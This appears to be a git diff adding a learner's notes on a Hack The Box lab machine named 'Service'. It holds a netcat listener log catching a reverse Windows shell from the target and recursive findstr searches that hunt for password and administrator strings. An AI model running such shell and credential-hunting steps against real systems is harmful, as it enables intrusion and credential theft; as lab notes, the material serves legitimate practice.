--- a/HTB/10.10.11.10-Service.md
+++ b/HTB/10.10.11.10-Service.md
@@ -1,1 +1,26 @@
-##SERVICE
+#10.10.11.10 - SERVICE
+
+
+
+
+
+
+`sudo lsof -i :<port>`
+`kill -9` <pid of that listening local port>
+
+PS C:\> findstr /l /s /i password > c:\users\sqladmin\downloads\password.txt
+
+<code>
+komal@kali:~/Documents/htb/service$ sudo nc -lvnp 4343
+listening on [any] 4343 ...
+connect to [10.10.14.5] from (UNKNOWN) [10.10.11.10] 49718
+Microsoft Windows [Version 10.0.17763.1158]
+(c) 2018 Microsoft Corporation. All rights reserved.
+
+C:\Windows\system32>cd /
+cd /
+
+C:\>findstr /s /i administrator *.* > c:\users\sqladmin\downloads\admin.txt
+findstr /s /i administrator *.* > c:\users\sqladmin\downloads\admin.txt
+
+</code>
